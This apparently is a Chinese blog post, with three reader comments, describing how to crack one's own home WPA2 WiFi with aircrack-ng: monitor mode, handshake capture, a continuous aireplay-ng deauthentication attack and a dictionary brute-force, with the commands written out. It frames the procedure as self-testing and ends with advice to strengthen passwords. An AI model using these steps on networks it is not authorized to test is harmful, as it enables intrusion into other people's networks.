随便说些什么 对自家wifi进行的一次测试 03月 02 发表于 2019-01-30 浏览量 856 评论数 3  因为过程比较简单。所以就没有截图啦。简单讲一下`思路过程`吧。测试下你家的wifi ## 准备 一台能连wifi电脑(含网卡无论内置或者外置的都可以) `linux 系统` ## 安装 aircrack-ng 我的运行环境:`Ubuntu 1804 lts` 打开终端 ```js sudo apt install aircrack-ng ``` yes安装 ## 查看本机的网卡 ```js 先提升权限输入密码 sudo su 查看网卡 airmon-ng ``` 接下来你会看到你的`网卡` 这里我的网卡叫`wlp2s0` ## 开启监听 ```js airmon-ng start <网卡名称> airmon-ng start wlp2s0 ``` 这个时候你的网卡会被命名为监听状态下的网卡名称 为`wlp2s0mon ` 具体看输出啦 ## 扫描 ```js airodump-ng <处于监听模式的网卡名称> airodump-ng wlp2s0mon ``` 这个时候会有个列表 很多信息自己看看吧 大概介绍一下 >BSSID: 无线 AP 的硬件地址 >PWR: 信号强度,值是负数,绝对值越小表示信号越强 >CH: 无线网络信道 >ESSID: 无线网络的名称 >ENC: 加密方式,我们要破解的是 WPA2 并且只能选择 wpa2的 第二个列表表示用户的连接信息 >BSSID: 无线 AP 的硬件地址 >STATION: 用户设备的硬件地址指连接手机或着其他设备的地址 扫到你的目标就 `Ctrl-C` 退出 ## 获取握手包 ```js airodump-ng -w <扫描结果保存的文件名> -c <无线网络信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称> ``` 刚刚扫描的时候左上角提示是这样的 CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49 当你看到出现 ][ WPA handshake:<你的目标地址> 后就可以暂停了 握手包会保存在`主目录`里这里的主目录就是你的linux系统下用户的主目录 会找到一个命名为 `<你的命名>-01.cap`的文件 这个就是`握手包` 扫描过程中如果有用户设备尝试连接 `Wi-Fi` 时,我们就会拿到握手包。 ## 选择步骤 在获取握手包的过程中 可以用手机连连WiFi或者对其进行攻击然后快速获取`握手包` 先打开另外一个终端 ```js aireplay-ng -<攻击模式> <攻击次数> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称> ``` 攻击次数写`0`和模式都写 `0 `代表一直攻击 ## 使用字典dictionary进行爆破wifi密码 ```js aircrack-ng -w 密码字典 <包含握手包的 cap 文件> ``` `字典dictionary`自行准备吧 下一次我会写一篇关于简单字典制作的文章 然后 等结果啦 出现`KEY FOUND! [ ]`的时候就是破解成功啦! 没有的话 就是失败了 如果成功了 你就改改家庭WiFi密码啦 在这里提醒下 提升家庭wifi密码复杂度 防止意外发生吧 还有 就是 家里装了监控的 密码也一样 还有 不要去干坏事哦 ! 赞赏 微信扫一扫,向我赞赏 支付宝扫一扫,向我赞赏
能连上wifi的电脑,证明已经拿到该wifi的密码了,感觉没什么作用。
能连不是能连上
然后还要数据字典去破解其实这样很麻烦,成功率也不高,很多app都是这么做的,效果很不理想。